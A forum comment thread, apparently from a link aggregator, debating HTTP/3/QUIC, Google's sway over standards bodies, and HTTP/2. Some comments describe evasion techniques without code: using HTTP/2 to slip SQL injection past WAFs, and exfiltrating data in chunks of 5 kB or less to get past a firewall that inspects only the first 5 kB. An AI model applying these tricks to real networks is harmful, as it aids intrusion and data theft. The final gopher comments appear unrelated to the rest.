1. 15

    Q: is the HTTP protocol really the problem that needs fixing?

    I’m under the belief that if the HTTP overhead is causing you issues then there are many alternative ways to fix this that don’t require more complexity. A site doesn’t load slowly because of HTTP, it loads slowly because it’s poorly designed in other ways.

    I’m also suspicious by Google’s involvement. TCP HTTP 1.1 is very simple to debug and do by hand. Google seems to like closing or controlling open things (Google chat support for XMPP, Google AMP, etc). Extra complexity is something that should be avoided, especially for the open web.

    1. 10

      They have to do the fix on HTTP because massive ecosystems already depend on HTTP and browsers with no intent to switch. There’s billions of dollars riding on staying on that gravy train, too. It’s also worth noting lots of firewalls in big companies let HTTP traffic through but not better-designed protocols. The low-friction improvements get more uptake by IT departments.

      1. 7

        WAFs and the like barely support HTTP/2 tho; a friend gave a whole talk on bypasses and scanning for it, for example

        1. 6

          Thanks for feedback. I’m skimming the talk’s slides right now. So far, it looks like HTTP/2 got big adoption but WAF’s lagged behind. Probably just riding their cash cows minimizing further investment. I’m also sensing business opportunity if anyone wants to build a HTTP/2 and /3 WAF that works with independent testing showing nothing else or others didn’t. Might help bootstrap the company.

          1. 3

            ja, that’s exactly correct: lots of the big-name WAFs/NGFWs/&c. are missing support for HTTP/2 but many of the mainline servers support it, so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

            I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…

            1. 4

              so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

              Unbelievable… That shit is why I’m not in the security industry. People mostly building and buying bullshit. There’s exceptions but usually setup to sell out later. Products based on dual-licensed code are about only thing immune to vendor risk. Seemingly. Still exploring hybrid models to root out this kind of BS or force it to change faster.

              “I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…”

              Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

              1. 5

                Products based on dual-licensed code

                We do this where I work, and it’s pretty nice, tho of course we have certain things that are completely closed source. We have a few competitors that use our products, so it’s been an interesting ecosystem to dive into for me…

                Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                pfff… there’s a “NGFW” vendor I know that…

                • when it sees a connection it doesn’t know, analyzes the first 5k bytes
                • this allows the connection to continue until the 5k+1 byte is met
                • subsequently, if your exfiltration process transfers data in packages of <= 5kB, you’re ok!

                we found this during an adversary simulation assessment (“red team”), and I think it’s one of the most asinine things I’ve seen in a while. The vendor closed it as works as expected

                edit fixed the work link as that’s a known issue.

                1. 3

                  BTW, Firefox complains when I go to https://trailofbits.com/ that the cert isn’t configured properly…

                  1. 2

                    hahaha Nick and I were just talking about that; its been reported before, I’ll kick it up the chain again. Thanks for that! I probably should edit my post for that…

                    1. 2

                      Adding another data point: latest iOS also complains about the cert

        2. 3

          They have to do the fix on HTTP

          What ‘fix’? Will this benefit anyone other than Google?

          I’m concerned that if this standard is not actually a worthwhile improvement for everyone else, then it won’t be adopted and IETF will lose respect. I’m running on the guess that’s it’s going to have even less adoption than HTTP2.

        3. 13

          I understand and sympathize with your criticism of Google, but it seems misplaced here. This isn’t happening behind closed doors. The IETF is an open forum.

          1. 6

            just because they do some subset of the decision making in the open shouldn’t exempt them from blame

            1. 3

              Feels like Google’s turned a lot public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

              1. 5

                Any browser vendor can ship what they want if they think that makes them more attractive to users or what not. Doesn’t mean it’s a standard. WebUSB has shipped in Chrome (and only in Chrome) more than a year ago. The WebUSB spec is still an Editor’s Draft and it seems unlikely to advance significantly along the standards track.

                The problem is not with the standards bodies, but with user choice, market incentive, blah blah.

                1. 3

                  Feels like Google’s turned a lot public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                  “WebUSB”? It’s like kuru crossed with ebola. Where do I get off this train.

                2. 2

                  Google is incapable of doing bad things in an open forum? Open forums cannot be influenced in bad ways?

                  This does not displace my concerns :/ What do you mean exactly?

                  1. 4

                    If the majority of the IETF HTTP WG agrees, I find it rather unlikely that this is going according to a great plan towards “closed things”.

                    Your “things becoming closed-access” argument doesn’t hold, imho: While I have done lots of plain text debugging for HTTP, SMTP, POP and IRC, I can’t agree with it as a strong argument: Whenever debugging gets serious, I go back to writing a script anyway. Also, I really want the web to become encrypted by default (HTTPS). We need “plain text for easy debugging” to go away. The web needs to be great (secure, private, etc.) for users first - engineers second.

                    1. 2

                      That “users first-engineers second” mantra leads to things like Apple and Microsoft clamping down on the “general purpose computer”-think of the children the users! They can’t protect themselves. We’re facing this at work (“the network and computers need to be secure, private, etc) and it’s expected we won’t be able to do any development because of course, upper management doesn’t trust us mere engineers with “general purpose computers”. Why can’t it be for “everybody?” Engineers included?

                      1. 1

                        No, no, you misunderstand.

                        The users first / engineers second is not about the engineers as end users like in your desktop computer example.

                        what I mean derives from the W3C design principles. That is to say, we shouldn’t avoid significant positive change (e.g., HTTPS over HTTP) just because it’s a bit harder on the engineering end.

                        1. 6

                          Define “positive change.” Google shoved HTTP/2 down our throats because it serves their interests not ours. Google is shoving QUIC down our throats because again, it serves their interests not ours. That it coincides with your biases is good for you; others might feel differently. What “positive change” does running TCP over TCP give us (HTTP/2)? What “positive change” does a reimplementation of SCTP give us (QUIC)? I mean, other than NIH syndrome?

                          1. 3

                            Are you asking what how QUIC and H2 work or are you saying performance isn’t worth improving? If it’s the latter, I think we’ve figured out why we disagree here. If it’s the former, I kindly ask you to find out yourself before you enter this dispute.

                            1. 3

                              I know how they work. I’m asking, why are they reimplementing already implemented concepts? I’m sorry, but TCP over TCP (aka HTTP/2) is plain stupid—one lost packet and every stream on that connection hits a brick wall.

                              1. 1

                                SPDY and its descendants are designed to allow web pages with lots of resources (namely, images, stylesheets, and scripts) to load quickly. A sizable number of people think that web pages should just not have lots of resources.

                1. 5

                  A great write-up! I’ve also been collecting tutorials and guides for aspiring gopher content creators. You can find it over at https://gopher.zone

                  1. 3

                    That’s so cool! Although deep down I know it probably won’t, I’d love for Gopher to make a comeback (where comeback is “more software understands gopher://”).

                    Will you be providing links to the other articles up at gopher://sdf.org:70/1/sdf/faq/GOPHER as well?

                    1. 3

                      There’s a small but thriving phlogging community on gopher.